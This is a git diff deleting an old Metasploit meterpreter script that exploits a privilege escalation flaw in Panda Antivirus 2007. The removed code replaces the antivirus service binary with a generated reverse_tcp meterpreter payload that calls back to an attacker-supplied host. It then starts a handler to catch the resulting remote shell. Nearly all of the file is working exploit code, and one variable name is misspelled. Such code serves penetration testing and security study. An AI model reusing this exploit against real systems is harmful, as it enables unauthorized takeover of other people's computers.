diff --git a/scripts/meterpreter/panda_2007_pavsrv51.rb b/scripts/meterpreter/panda_2007_pavsrv51.rb
deleted file mode 100644
index 031dcf1d5b..0000000000
--- a/scripts/meterpreter/panda_2007_pavsrv51.rb
+++ /dev/null
@@ -1,115 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# https://metasploit.com/framework/
-##
-
-##
-# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
-# If you'd like to improve this script, please try to port it as a post
-# module instead. Thank you.
-##
-
-
-
-##
-# Panda Antivirus 2007 Local Privilege Escalation
-# This module exploits a privilege escalation vulnerability in
-# Panda Antivirus 2007. Due to insecure permission issues, a
-# local attacker can gain elevated privileges.
-#
-# This script has only been tested against Panda Antivirus 2007.
-#
-# BID - 4257
-# mc[@]metasploit.com
-##
-
-#
-# Options
-#
-@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-rhost = nil
-rport = nil
-
-def usage
- print_status("Panda Antivirus 2007 Privilege Escalation.")
- print_line(@exec_opts.usage)
- raise Rex::Script::Completed
-end
-
-#
-# Option parsing
-#
-@exec_opts.parse(args) do |opt, idx, val|
- case opt
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- else
- usage
- end
-end
-
-if rhost.nil? or rport.nil?
- usage
-elsif client.platform == 'windows'
- client.sys.process.get_processes().each do |m|
-
- if ( m['name'] =~ /PAVSRV51\.EXE/ )
- print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
-
- # Build out the exe payload.
- pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
- pay.datastore['LHOST'] = rhost
- pay.datastore['LPORT'] = rport
- raw = pay.generate
-
- exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-
- # Change to our working directory.
- workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
- client.fs.dir.chdir(workindir)
-
- # Create a backup of the original exe.
- print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
- client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
-
- # Place our newly created exe with the orginal binary name.
- tempexe = workingdir + "PAVSRV51.EXE"
-
- print_status("Sending EXE payload '#{tempexe}'.")
- fd = client.fs.file.new(tempexe, "wb")
- fd.write(exe)
- fd.close
-
- print_status("Done, now just wait for the callback...")
-
- # Our handler to recieve the callback.
- handler = client.framework.exploits.create("multi/handler")
- handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
- handler.datastore['LHOST'] = rhost
- handler.datastore['LPORT'] = rport
- # Keep our shell stable.
- handler.datastore['InitialAutoRunScript'] = "migrate -f"
- handler.datastore['ExitOnSession'] = false
-
- handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
- )
- end
- end
-else
- print_error("This version of Meterpreter is not supported with this script!")
- raise Rex::Script::Completed
-end